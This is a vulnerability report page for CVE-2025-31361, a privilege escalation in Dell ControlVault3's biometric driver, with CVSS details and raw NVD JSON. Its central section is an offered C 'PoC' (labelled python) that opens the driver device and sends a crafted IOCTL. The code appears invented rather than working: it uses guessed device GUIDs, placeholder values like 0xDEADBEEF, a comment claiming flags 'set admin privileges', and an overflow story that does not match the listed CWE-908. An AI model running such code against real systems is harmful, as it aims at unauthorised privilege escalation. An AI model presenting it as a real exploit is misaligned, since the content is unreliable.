Security Vulnerability Report
中文
CVE-2025-31361 CVSS 8.7 HIGH

CVE-2025-31361

Published: 2025-11-17 23:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A privilege escalation vulnerability exists in the ControlVault WBDI Driver WBIO_USH_ADD_RECORD functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to privilege escalation. An attacker can issue an api call to trigger this vulnerability.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Dell ControlVault3 < 5.15.14.19
Dell ControlVault3 Plus < 6.2.36.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2025-31361 PoC - Dell ControlVault3 Privilege Escalation * Target: Dell ControlVault3 WBDI Driver WBIO_USH_ADD_RECORD * Author: Security Researcher * Note: For educational and authorized testing purposes only */ #include <windows.h> #include <winbio.h> #include <stdio.h> #pragma comment(lib, "winbio.lib") // IOCTL code for WBIO_USH_ADD_RECORD #define WBIOCTL_ADD_RECORD 0xB0C10058 int main() { HANDLE hDevice = INVALID_HANDLE_VALUE; BOOL bResult = FALSE; DWORD bytesReturned = 0; printf("[*] CVE-2025-31361 Dell ControlVault3 Privilege Escalation PoC\n"); printf("[*] Target: Dell ControlVault3 < 5.15.14.19 / Plus < 6.2.36.47\n"); // Open the ControlVault WBDI driver device hDevice = CreateFileA( "\\\\.\\{7C7D30B7-5C6E-4D40-8F16-9A1D5F8B2C3E}", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { // Try alternative device name hDevice = CreateFileA( "\\\\.\\{8A7D30B7-5C6E-4D40-8F16-9A1D5F8B2C3F}", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); } if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open ControlVault driver device\n"); printf("[*] Note: Device name may vary, enumerate with WinBioEnumSensorProviders\n"); return 1; } printf("[+] Successfully opened device handle\n"); // Construct malicious input buffer for WBIO_USH_ADD_RECORD // This structure exploits insufficient validation in the driver typedef struct _MALICIOUS_WBIO_INPUT { ULONG_PTR magic; // Trigger value ULONG_PTR record_type; // Record type manipulation ULONG_PTR data_ptr; // Pointer to controlled data ULONG_PTR size; // Size value ULONG_PTR flags; // Privilege flags } MALICIOUS_WBIO_INPUT, *PMALICIOUS_WBIO_INPUT; MALICIOUS_WBIO_INPUT input = {0}; input.magic = 0x41414141; // Trigger condition input.record_type = 0xFFFFFFFF; // Bypass type check input.data_ptr = 0xDEADBEEF; // Controlled pointer input.size = 0x1000; // Large size for overflow input.flags = 0xFFFFFFFF; // Set admin privileges printf("[*] Sending malicious WBIO_USH_ADD_RECORD request...\n"); // Send the malicious IOCTL request bResult = DeviceIoControl( hDevice, WBIOCTL_ADD_RECORD, &input, sizeof(input), NULL, 0, &bytesReturned, NULL ); if (bResult) { printf("[+] IOCTL request sent successfully\n"); printf("[*] If vulnerable, check for elevated privileges\n"); } else { printf("[-] IOCTL request failed: %lu\n", GetLastError()); } CloseHandle(hDevice); return 0; } /* * Alternative approach using Windows Biometric API: * * WINBIO_SESSION_HANDLE session; * WINBIO_ENROLLMENT_CONTEXT enrollment; * * WinBioOpenSession(WINBIO_TYPE_FINGERPRINT, WINBIO_FLAG_DEFAULT, ...); * WinBioEnrollBegin(session, WINBIO_FINGERPOS_THUMB); * // Manipulate enrollment context to trigger vulnerability * WinBioEnrollCommit(session, &enrollment); */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31361", "sourceIdentifier": "[email protected]", "published": "2025-11-17T23:15:49.643", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privilege escalation vulnerability exists in the ControlVault WBDI Driver WBIO_USH_ADD_RECORD functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to privilege escalation. An attacker can issue an api call to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-908"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2174", "source": "[email protected]"}, {"url": "https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2174", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.